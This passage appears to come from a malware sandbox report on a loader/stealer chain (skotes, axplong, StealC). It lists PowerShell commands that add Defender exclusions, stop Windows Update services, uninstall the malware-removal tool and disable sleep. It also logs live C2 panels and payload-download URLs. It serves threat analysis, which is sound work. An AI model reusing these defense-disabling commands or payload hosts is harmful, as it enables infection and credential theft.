                      PID:2508
                      • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                        C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                        2⤵
                        • Command and Scripting Interpreter: PowerShell
                        • Drops file in System32 directory
                        • Modifies data under HKEY_USERS
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:304
                      • C:\Windows\system32\cmd.exe
                        C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                        2⤵
                          PID:536
                          • C:\Windows\system32\wusa.exe
                            wusa /uninstall /kb:890830 /quiet /norestart
                            3⤵
                            • Drops file in Windows directory
                            PID:3028
                        • C:\Windows\system32\sc.exe
                          C:\Windows\system32\sc.exe stop UsoSvc
                          2⤵
                          • Launches sc.exe
                          PID:3692
                        • C:\Windows\system32\sc.exe
                          C:\Windows\system32\sc.exe stop WaaSMedicSvc
                          2⤵
                          • Launches sc.exe
                          PID:3696
                        • C:\Windows\system32\sc.exe
                          C:\Windows\system32\sc.exe stop wuauserv
                          2⤵
                          • Launches sc.exe
                          PID:3868
                        • C:\Windows\system32\sc.exe
                          C:\Windows\system32\sc.exe stop bits
                          2⤵
                          • Launches sc.exe
                          PID:3644
                        • C:\Windows\system32\sc.exe
                          C:\Windows\system32\sc.exe stop dosvc
                          2⤵
                          • Launches sc.exe
                          PID:2652
                        • C:\Windows\system32\powercfg.exe
                          C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                          2⤵
                          • Power Settings
                          • Suspicious use of AdjustPrivilegeToken
                          PID:3968
                        • C:\Windows\system32\powercfg.exe
                          C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                          2⤵
                          • Power Settings
                          • Suspicious use of AdjustPrivilegeToken
                          PID:3952
                        • C:\Windows\system32\powercfg.exe
                          C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                          2⤵
                          • Power Settings
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2756
                        • C:\Windows\system32\powercfg.exe
                          C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                          2⤵
                          • Power Settings
                          • Suspicious use of AdjustPrivilegeToken
                          PID:3584
                        • C:\Windows\system32\conhost.exe
                          C:\Windows\system32\conhost.exe
                          2⤵
                            PID:584
                          • C:\Windows\system32\cmd.exe
                            cmd.exe
                            2⤵
                            • Blocklisted process makes network request
                            • Modifies data under HKEY_USERS
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1496
                        • C:\Windows\system32\conhost.exe
                          \??\C:\Windows\system32\conhost.exe "1158617351134015211602549921454560433-482067733-1977999385-1879959631968701546"
                          1⤵
                            PID:2724

                          Network

                          • flag-ru
                            POST
                            http://185.215.113.43/Zu7JuNko/index.php
                            skotes.exe
                            Remote address:
                            185.215.113.43:80
                            Request
                            POST /Zu7JuNko/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 185.215.113.43
                            Content-Length: 4
                            Cache-Control: no-cache
                            Response
                            HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 04 Dec 2024 04:20:37 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Refresh: 0; url = Login.php
                          • flag-ru
                            POST
                            http://185.215.113.43/Zu7JuNko/index.php
                            skotes.exe
                            Remote address:
                            185.215.113.43:80
                            Request
                            POST /Zu7JuNko/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 185.215.113.43
                            Content-Length: 156
                            Cache-Control: no-cache
                            Response
                            HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 04 Dec 2024 04:20:38 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                          • flag-ru
                            POST
                            http://185.215.113.43/Zu7JuNko/index.php
                            skotes.exe
                            Remote address:
                            185.215.113.43:80
                            Request
                            POST /Zu7JuNko/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 185.215.113.43
                            Content-Length: 31
                            Cache-Control: no-cache
                            Response
                            HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 04 Dec 2024 04:20:43 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                          • flag-ru
                            POST
                            http://185.215.113.43/Zu7JuNko/index.php
                            skotes.exe
                            Remote address:
                            185.215.113.43:80
                            Request
                            POST /Zu7JuNko/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 185.215.113.43
                            Content-Length: 31
                            Cache-Control: no-cache
                            Response
                            HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 04 Dec 2024 04:20:48 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                          • flag-ru
                            POST
                            http://185.215.113.43/Zu7JuNko/index.php
                            skotes.exe
                            Remote address:
                            185.215.113.43:80
                            Request
                            POST /Zu7JuNko/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 185.215.113.43
                            Content-Length: 31
                            Cache-Control: no-cache
                            Response
                            HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 04 Dec 2024 04:20:55 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                          • flag-ru
                            POST
                            http://185.215.113.43/Zu7JuNko/index.php
                            skotes.exe
                            Remote address:
                            185.215.113.43:80
                            Request
                            POST /Zu7JuNko/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 185.215.113.43
                            Content-Length: 31
                            Cache-Control: no-cache
                            Response
                            HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 04 Dec 2024 04:21:10 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                          • flag-ru
                            POST
                            http://185.215.113.43/Zu7JuNko/index.php
                            skotes.exe
                            Remote address:
                            185.215.113.43:80
                            Request
                            POST /Zu7JuNko/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 185.215.113.43
                            Content-Length: 31
                            Cache-Control: no-cache
                            Response
                            HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 04 Dec 2024 04:21:16 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                          • flag-ru
                            GET
                            http://176.113.115.203/thebig/stories.exe
                            skotes.exe
                            Remote address:
                            176.113.115.203:80
                            Request
                            GET /thebig/stories.exe HTTP/1.1
                            Host: 176.113.115.203
                            Response
                            HTTP/1.1 200 OK
                            Server: nginx/1.14.1
                            Date: Wed, 04 Dec 2024 04:20:39 GMT
                            Content-Type: application/octet-stream
                            Content-Length: 3523202
                            Connection: keep-alive
                            X-Powered-By: PHP/7.4.33
                            Content-Description: File Transfer
                            Content-Disposition: attachment; filename=stories.exe
                            Content-Transfer-Encoding: binary
                            Expires: 0
                            Cache-Control: must-revalidate
                            Pragma: public
                          • flag-us
                            DNS
                            filelu.com
                            skotes.exe
                            Remote address:
                            8.8.8.8:53
                            Request
                            filelu.com
                            IN A
                            Response
                            filelu.com
                            IN A
                            104.26.12.42
                            filelu.com
                            IN A
                            104.26.13.42
                            filelu.com
                            IN A
                            172.67.68.204
                          • flag-us
                            GET
                            https://filelu.com/kYVDUI6BhLxQFkmq/UpdatedAgain.cmd
                            skotes.exe
                            Remote address:
                            104.26.12.42:443
                            Request
                            GET /kYVDUI6BhLxQFkmq/UpdatedAgain.cmd HTTP/1.1
                            Host: filelu.com
                            Response
                            HTTP/1.1 302 Found
                            Date: Wed, 04 Dec 2024 04:20:44 GMT
                            Content-Length: 0
                            Connection: keep-alive
                            Location: https://3434.filelu.cloud/d/rj3kav2ljs6ftjtauomnm6xxy62vclfeblizyog7oi6uld2wwwrn5rj2kbk7s4we6vpbwamw/UpdatedAgain.cmd
                            CF-Cache-Status: DYNAMIC
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ImXcuyiU39EzHvasXuL9MvSdqf9ir5vg84qqFR6gTi8SkwsWNmrrKWJJYi1Wzb1ZITQsl8w6KrjFJz2Ek6sl0IEWc8skpHVnnSequgWTIz9Wp9Y751l1URea%2Bdk%3D"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            X-Content-Type-Options: nosniff
                            Server: cloudflare
                            CF-RAY: 8ec9016d9d4b9550-LHR
                            alt-svc: h3=":443"; ma=86400
                            server-timing: cfL4;desc="?proto=TCP&rtt=73192&min_rtt=47193&rtt_var=60860&sent=6&recv=7&lost=0&retrans=0&sent_bytes=3130&recv_bytes=385&delivery_rate=70981&cwnd=253&unsent_bytes=0&cid=765670d09efa6cfd&ts=714&x=0"
                          • flag-us
                            DNS
                            c.pki.goog
                            skotes.exe
                            Remote address:
                            8.8.8.8:53
                            Request
                            c.pki.goog
                            IN A
                            Response
                            c.pki.goog
                            IN CNAME
                            pki-goog.l.google.com
                            pki-goog.l.google.com
                            IN A
                            142.250.200.3
                          • flag-gb
                            GET
                            http://c.pki.goog/r/gsr1.crl
                            skotes.exe
                            Remote address:
                            142.250.200.3:80
                            Request
                            GET /r/gsr1.crl HTTP/1.1
                            Connection: Keep-Alive
                            Accept: */*
                            User-Agent: Microsoft-CryptoAPI/6.1
                            Host: c.pki.goog
                            Response
                            HTTP/1.1 200 OK
                            Accept-Ranges: bytes
                            Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/cacerts
                            Cross-Origin-Resource-Policy: cross-origin
                            Cross-Origin-Opener-Policy: same-origin; report-to="cacerts"
                            Report-To: {"group":"cacerts","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/cacerts"}]}
                            Content-Length: 1739
                            X-Content-Type-Options: nosniff
                            Server: sffe
                            X-XSS-Protection: 0
                            Date: Wed, 04 Dec 2024 03:36:07 GMT
                            Expires: Wed, 04 Dec 2024 04:26:07 GMT
                            Cache-Control: public, max-age=3000
                            Age: 2676
                            Last-Modified: Mon, 07 Oct 2024 07:18:00 GMT
                            Content-Type: application/pkix-crl
                            Vary: Accept-Encoding
                          • flag-gb
                            GET
                            http://c.pki.goog/r/r4.crl
                            skotes.exe
                            Remote address:
                            142.250.200.3:80
                            Request
                            GET /r/r4.crl HTTP/1.1
                            Connection: Keep-Alive
                            Accept: */*
                            User-Agent: Microsoft-CryptoAPI/6.1
                            Host: c.pki.goog
                            Response
                            HTTP/1.1 200 OK
                            Accept-Ranges: bytes
                            Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/cacerts
                            Cross-Origin-Resource-Policy: cross-origin
                            Cross-Origin-Opener-Policy: same-origin; report-to="cacerts"
                            Report-To: {"group":"cacerts","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/cacerts"}]}
                            Content-Length: 436
                            X-Content-Type-Options: nosniff
                            Server: sffe
                            X-XSS-Protection: 0
                            Date: Wed, 04 Dec 2024 03:36:01 GMT
                            Expires: Wed, 04 Dec 2024 04:26:01 GMT
                            Cache-Control: public, max-age=3000
                            Age: 2682
                            Last-Modified: Thu, 25 Jul 2024 14:48:00 GMT
                            Content-Type: application/pkix-crl
                            Vary: Accept-Encoding
                          • flag-us
                            DNS
                            3434.filelu.cloud
                            skotes.exe
                            Remote address:
                            8.8.8.8:53
                            Request
                            3434.filelu.cloud
                            IN A
                            Response
                            3434.filelu.cloud
                            IN A
                            67.23.237.28
                          • flag-us
                            GET
                            https://3434.filelu.cloud/d/rj3kav2ljs6ftjtauomnm6xxy62vclfeblizyog7oi6uld2wwwrn5rj2kbk7s4we6vpbwamw/UpdatedAgain.cmd
                            skotes.exe
                            Remote address:
                            67.23.237.28:443
                            Request
                            GET /d/rj3kav2ljs6ftjtauomnm6xxy62vclfeblizyog7oi6uld2wwwrn5rj2kbk7s4we6vpbwamw/UpdatedAgain.cmd HTTP/1.1
                            Connection: Keep-Alive
                            Host: 3434.filelu.cloud
                            Response
                            HTTP/1.1 200 OK
                            Server: nginx
                            Date: Wed, 04 Dec 2024 04:20:45 GMT
                            Content-Type: application/octet-stream
                            Content-Length: 1091372
                            Last-Modified: Tue, 03 Dec 2024 22:24:48 GMT
                            Connection: close
                            ETag: "674f8530-10a72c"
                            Access-Control-Allow-Origin: https://filelu.com
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Allow-Headers: Content-Type
                            Content-Disposition: attachment
                            Cache-Control:: no-cache
                            Accept-Ranges: bytes
                          • flag-us
                            DNS
                            r11.o.lencr.org
                            skotes.exe
                            Remote address:
                            8.8.8.8:53
                            Request
                            r11.o.lencr.org
                            IN A
                            Response
                            r11.o.lencr.org
                            IN CNAME
                            o.lencr.edgesuite.net
                            o.lencr.edgesuite.net
                            IN CNAME
                            a1887.dscq.akamai.net
                            a1887.dscq.akamai.net
                            IN A
                            88.221.134.89
                            a1887.dscq.akamai.net
                            IN A
                            88.221.134.137
                          • flag-gb
                            GET
                            http://r11.o.lencr.org/MFMwUTBPME0wSzAJBgUrDgMCGgUABBQaUrm0WeTDM5ghfoZtS72KO9ZnzgQUCLkRO6XQhRi06g%2BgrZ%2BGHo78OCcCEgS2642r6Dvuq8kP4nfWWv6NOw%3D%3D
                            skotes.exe
                            Remote address:
                            88.221.134.89:80
                            Request
                            GET /MFMwUTBPME0wSzAJBgUrDgMCGgUABBQaUrm0WeTDM5ghfoZtS72KO9ZnzgQUCLkRO6XQhRi06g%2BgrZ%2BGHo78OCcCEgS2642r6Dvuq8kP4nfWWv6NOw%3D%3D HTTP/1.1
                            Connection: Keep-Alive
                            Accept: */*
                            User-Agent: Microsoft-CryptoAPI/6.1
                            Host: r11.o.lencr.org
                            Response
                            HTTP/1.1 200 OK
                            Server: nginx
                            Content-Type: application/ocsp-response
                            Content-Length: 504
                            ETag: "23AFEFE45EB695F211709DD5D7BD6819B9F9EF878BADB76B27E43EB37D36DAC3"
                            Last-Modified: Tue, 03 Dec 2024 07:30:00 UTC
                            Cache-Control: public, no-transform, must-revalidate, max-age=1579
                            Expires: Wed, 04 Dec 2024 04:47:03 GMT
                            Date: Wed, 04 Dec 2024 04:20:44 GMT
                            Connection: keep-alive
                          • flag-ru
                            GET
                            http://185.215.113.16/soka/random.exe
                            skotes.exe
                            Remote address:
                            185.215.113.16:80
                            Request
                            GET /soka/random.exe HTTP/1.1
                            Host: 185.215.113.16
                            Response
                            HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 04 Dec 2024 04:20:48 GMT
                            Content-Type: application/octet-stream
                            Content-Length: 1927168
                            Last-Modified: Wed, 04 Dec 2024 03:53:02 GMT
                            Connection: keep-alive
                            ETag: "674fd21e-1d6800"
                            Accept-Ranges: bytes
                          • flag-ru
                            POST
                            http://185.215.113.16/Jo89Ku7d/index.php
                            axplong.exe
                            Remote address:
                            185.215.113.16:80
                            Request
                            POST /Jo89Ku7d/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 185.215.113.16
                            Content-Length: 4
                            Cache-Control: no-cache
                            Response
                            HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 04 Dec 2024 04:20:55 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Refresh: 0; url = Login.php
                          • flag-ru
                            POST
                            http://185.215.113.16/Jo89Ku7d/index.php
                            axplong.exe
                            Remote address:
                            185.215.113.16:80
                            Request
                            POST /Jo89Ku7d/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 185.215.113.16
                            Content-Length: 156
                            Cache-Control: no-cache
                            Response
                            HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 04 Dec 2024 04:20:55 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                          • flag-ru
                            GET
                            http://185.215.113.16/inc/stealc_default2.exe
                            axplong.exe
                            Remote address:
                            185.215.113.16:80
                            Request
                            GET /inc/stealc_default2.exe HTTP/1.1
                            Host: 185.215.113.16
                            Response
                            HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 04 Dec 2024 04:20:55 GMT
                            Content-Type: application/octet-stream
                            Content-Length: 314368
                            Last-Modified: Thu, 10 Oct 2024 11:31:17 GMT
                            Connection: keep-alive
                            ETag: "6707bb05-4cc00"
                            Accept-Ranges: bytes
                          • flag-ru
                            POST
                            http://185.215.113.16/Jo89Ku7d/index.php
                            axplong.exe
                            Remote address:
                            185.215.113.16:80
                            Request
                            POST /Jo89Ku7d/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 185.215.113.16
                            Content-Length: 31
                            Cache-Control: no-cache
                            Response
                            HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 04 Dec 2024 04:20:56 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                          • flag-ru
                            GET
                            http://185.215.113.16/inc/alex2022.exe
                            axplong.exe
                            Remote address:
                            185.215.113.16:80
                            Request
                            GET /inc/alex2022.exe HTTP/1.1
                            Host: 185.215.113.16
                            Response
                            HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 04 Dec 2024 04:20:56 GMT
                            Content-Type: application/octet-stream
                            Content-Length: 1167872
                            Last-Modified: Mon, 02 Dec 2024 20:58:48 GMT
                            Connection: keep-alive
                            ETag: "674e1f88-11d200"
                            Accept-Ranges: bytes
                          • flag-ru
                            GET
                            http://31.41.244.11/files/7285219295/GI59vO6.exe
                            skotes.exe
                            Remote address:
                            31.41.244.11:80
                            Request
                            GET /files/7285219295/GI59vO6.exe HTTP/1.1
                            Host: 31.41.244.11
                            Response
                            HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 04 Dec 2024 04:20:55 GMT
                            Content-Type: application/octet-stream
                            Content-Length: 5261848
                            Last-Modified: Tue, 03 Dec 2024 22:40:43 GMT
                            Connection: keep-alive
                            ETag: "674f88eb-504a18"
                            Accept-Ranges: bytes
                          • flag-ru
                            GET
                            http://31.41.244.11/files/unique2/random.exe
                            skotes.exe
                            Remote address:
                            31.41.244.11:80
                            Request
                            GET /files/unique2/random.exe HTTP/1.1
                            Host: 31.41.244.11
                          • flag-ru
                            GET
                            http://31.41.244.11/files/martin/random.exe
                            skotes.exe
                            Remote address:
                            31.41.244.11:80
                            Request
                            GET /files/martin/random.exe HTTP/1.1
                            Host: 31.41.244.11
                          • flag-ru
                            GET
                            http://31.41.244.11/files/rhnew.exe
                            skotes.exe
                            Remote address:
                            31.41.244.11:80
                            Request
                            GET /files/rhnew.exe HTTP/1.1
                            Host: 31.41.244.11
                          • flag-ru
                            GET
                            http://185.215.113.17/
                            stealc_default2.exe
                            Remote address:
                            185.215.113.17:80
                            Request
                            GET / HTTP/1.1
                            Host: 185.215.113.17
                            Connection: Keep-Alive
                            Cache-Control: no-cache
                            Response
                            HTTP/1.1 200 OK
                            Date: Wed, 04 Dec 2024 04:20:56 GMT
                            Server: Apache/2.4.41 (Ubuntu)
                            Content-Length: 0
                            Keep-Alive: timeout=5, max=100
                            Connection: Keep-Alive
                            Content-Type: text/html; charset=UTF-8
                          • flag-ru
                            POST
                            http://185.215.113.17/2fb6c2cc8dce150a.php
                            stealc_default2.exe
                            Remote address:
                            185.215.113.17:80
                            Request
                            POST /2fb6c2cc8dce150a.php HTTP/1.1
                            Content-Type: multipart/form-data; boundary=----JEGHJKFHJJJKJJJJKEHC
                            Host: 185.215.113.17
                            Content-Length: 224
                            Connection: Keep-Alive
                            Cache-Control: no-cache
                          • flag-us
                            DNS
                            thicktoys.sbs
                            34204cee53.exe
                            Remote address:
                            8.8.8.8:53
                            Request
                            thicktoys.sbs
                            IN A
                            Response
                          • flag-ru
                            POST
                            http://185.215.113.36/Dem7kTu/index.php
                            Gxtuum.exe
                            Remote address:
                            185.215.113.36:80
                            Response
                            HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 04 Dec 2024 04:21:05 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Vary: Accept-Encoding
                            Request
                            POST /Dem7kTu/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 185.215.113.36
                            Content-Length: 156
                            Cache-Control: no-cache
                          • flag-ru
                            GET
                            http://185.215.113.36/Office2024.exe
                            Gxtuum.exe
                            Remote address:
                            185.215.113.36:80
                            Response
                            HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 04 Dec 2024 04:21:07 GMT
                            Content-Type: application/x-msdos-program
                            Content-Length: 2868224
                            Connection: keep-alive
                            Last-Modified: Sat, 25 Dec 2021 18:14:17 GMT
                            ETag: "2bc400-5d3fc708c1040"
                            Accept-Ranges: bytes
                            Request
                            GET /Office2024.exe HTTP/1.1
                            Host: 185.215.113.36
                          • flag-ru
                            POST
                            http://185.215.113.36/Dem7kTu/index.php
                            Gxtuum.exe
                            Remote address:
                            185.215.113.36:80
                            Request
                            POST /Dem7kTu/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 185.215.113.36
                            Content-Length: 32
                            Cache-Control: no-cache
                          • flag-us
                            DNS
                            Remote address:
                            8.8.8.8:53
                            Response
                          • flag-us
                            DNS
                            3xc1aimbl0w.sbs
                            34204cee53.exe
                            Remote address:
                            8.8.8.8:53
                            Request
                            3xc1aimbl0w.sbs
                            IN A
                          • flag-us
                            DNS
                            bored-light.sbs
                            34204cee53.exe
                            Remote address:
                            8.8.8.8:53
                            Request
                            bored-light.sbs
                            IN A
                            Response
                          • flag-us
                            DNS
                            300snails.sbs
                            34204cee53.exe
                            Remote address:
                            8.8.8.8:53
                            Request
                            300snails.sbs
                            IN A
                            Response
                          • flag-us
                            DNS
                            www.microsoft.com
                            34204cee53.exe
                            Remote address:
                            8.8.8.8:53
                            Request
                            www.microsoft.com
                            IN A
                            Response
                            www.microsoft.com
                            IN CNAME
                            www.microsoft.com-c-3.edgekey.net
                            www.microsoft.com-c-3.edgekey.net
                            IN CNAME
                            www.microsoft.com-c-3.edgekey.net.globalredir.akadns.net
                            www.microsoft.com-c-3.edgekey.net.globalredir.akadns.net
                            IN CNAME
                            e13678.dscb.akamaiedge.net
                            e13678.dscb.akamaiedge.net
                            IN A
                            95.100.245.144
                          • flag-gb
                            GET
                            http://www.microsoft.com/pkiops/crl/MicCodSigPCA2011_2011-07-08.crl
                            Remote address:
                            95.100.245.144:80
                            Request
                            GET /pkiops/crl/MicCodSigPCA2011_2011-07-08.crl HTTP/1.1
                            Connection: Keep-Alive
                            Accept: */*
                            If-Modified-Since: Sun, 18 Aug 2024 00:23:49 GMT
                            User-Agent: Microsoft-CryptoAPI/6.1
                            Host: www.microsoft.com
                            Response
                            HTTP/1.1 200 OK
                            Content-Length: 1078
                            Content-Type: application/octet-stream
                            Content-MD5: PjrtHAukbJio72s77Ag5mA==
                            Last-Modified: Thu, 31 Oct 2024 23:26:09 GMT
                            ETag: 0x8DCFA0366D6C4CA
                            x-ms-request-id: 56065f53-801e-0079-7eee-2babce000000
                            x-ms-version: 2009-09-19
                            x-ms-lease-status: unlocked
                            x-ms-blob-type: BlockBlob
                            Date: Wed, 04 Dec 2024 04:21:14 GMT
                            Connection: keep-alive
                            TLS_version: UNKNOWN
                            ms-cv: CASMicrosoftCV6d30e0a5.0
                            ms-cv-esi: CASMicrosoftCV6d30e0a5.0
                            X-RTag: RT
                          • flag-us
                            DNS
                            faintbl0w.sbs
                            34204cee53.exe
                            Remote address:
                            8.8.8.8:53
                            Request
                            faintbl0w.sbs
                            IN A
                            Response
                          • flag-us
                            DNS
                            home.sevkk17vt.top
                            trru7rd2.exe
                            Remote address:
                            8.8.8.8:53
                            Request
                            home.sevkk17vt.top
                            IN A
                            Response
                          • flag-us
                            DNS
                            home.sevkk17vt.top
                            trru7rd2.exe
                            Remote address:
                            8.8.8.8:53
                            Request
                            home.sevkk17vt.top
                            IN AAAA
                            Response
                          • flag-us
                            DNS
                            crib-endanger.sbs
                            34204cee53.exe
                            Remote address:
                            8.8.8.8:53
                            Request
                            crib-endanger.sbs
                            IN A
                            Response
                          • flag-us
                            DNS
                            steamcommunity.com
                            rhnew.exe
                            Remote address:
                            8.8.8.8:53
                            Request
                            steamcommunity.com
                            IN A
                            Response
                            steamcommunity.com
                            IN A
                            2.22.99.85
                          • flag-nl
                            GET
                            http://92.63.197.221/dll/download
                            6158293fba.exe
                            Remote address:
                            92.63.197.221:80
                            Response
                            HTTP/1.1 200 OK
                            Date: Wed, 04 Dec 2024 04:21:20 GMT
                            Server: Apache/2.4.58 (Ubuntu)
                            Content-Length: 21
                            Keep-Alive: timeout=5, max=99
                            Connection: Keep-Alive
                            Content-Type: text/html; charset=UTF-8
                            Request
                            GET /dll/download HTTP/1.1
                            Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                            Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                            Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                            Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                            User-Agent: 1
                            Host: 92.63.197.221
                            Connection: Keep-Alive
                            Cache-Control: no-cache
                          • flag-nl
                            GET
                            http://92.63.197.221/files/download
                            6158293fba.exe
                            Remote address:
                            92.63.197.221:80
                            Request
                            GET /files/download HTTP/1.1
                            Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                            Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                            Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                            Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                            User-Agent: C
                            Host: 92.63.197.221
                            Connection: Keep-Alive
                            Cache-Control: no-cache
                          • flag-ru
                            DNS
                            defnur.exe
                            Remote address:
                            185.215.113.209:80
                            Response
                            HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 04 Dec 2024 04:21:20 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Refresh: 0; url = Login.php
                          • flag-us
                            DNS
                            dare-curbys.biz
                            rhnew.exe
                            Remote address:
                            8.8.8.8:53
                            Request
                            dare-curbys.biz
                            IN A
                            Response
                            dare-curbys.biz
                            IN A
                            104.21.43.156
                            dare-curbys.biz
                            IN A
                            172.67.181.44
                          • flag-us
                            DNS
                            zinc-sneark.biz
                            rhnew.exe
                            Remote address:
                            8.8.8.8:53
                            Request
                            zinc-sneark.biz
                            IN A
                          • flag-us
                            DNS
                            Remote address:
                            8.8.8.8:53
                            Response
                            dwell-exclaim.biz
                            IN A
                            104.21.88.210
                            dwell-exclaim.biz
                            IN A
                            172.67.153.96
                          • flag-us
                            POST
                            https://dwell-exclaim.biz/api
                            v_dolg.exe
                            Remote address:
                            104.21.88.210:443
                            Request
                            POST /api HTTP/1.1
                            Connection: Keep-Alive
                            Content-Type: application/x-www-form-urlencoded
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                            Content-Length: 8
                            Host: dwell-exclaim.biz
                            Response
                            HTTP/1.1 200 OK
                            Date: Wed, 04 Dec 2024 04:21:24 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Set-Cookie: PHPSESSID=cd2tdb50q19cmujsvov4rr9lf6; expires=Sat, 29-Mar-2025 22:08:03 GMT; Max-Age=9999999; path=/
                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                            Cache-Control: no-store, no-cache, must-revalidate
                            Pragma: no-cache
                            CF-Cache-Status: DYNAMIC
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jgmJnk7XiOybWvmCA02Elp7tQ4uF6VY8yjbaqd4UolB0PAAeCM75cfSq5gM2Dmz9VX3QzPBZpEC4GlMqNMQZbrPa24P8cebeIB8%2FsfazWQd4qiuSMJVtUs5rYtpV8rWVbA%2FVAA%3D%3D"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            Server: cloudflare
                            CF-RAY: 8ec90269c9dc6355-LHR
                            alt-svc: h3=":443"; ma=86400
                            server-timing: cfL4;desc="?proto=TCP&rtt=50087&min_rtt=47329&rtt_var=11624&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2861&recv_bytes=585&delivery_rate=79491&cwnd=253&unsent_bytes=0&cid=385d7ecb097c4706&ts=357&x=0"
                          • flag-us
                            DNS
                            formy-spill.biz
                            rhnew.exe
                            Remote address:
                            8.8.8.8:53
                            Request
                            formy-spill.biz
                            IN A
                            Response
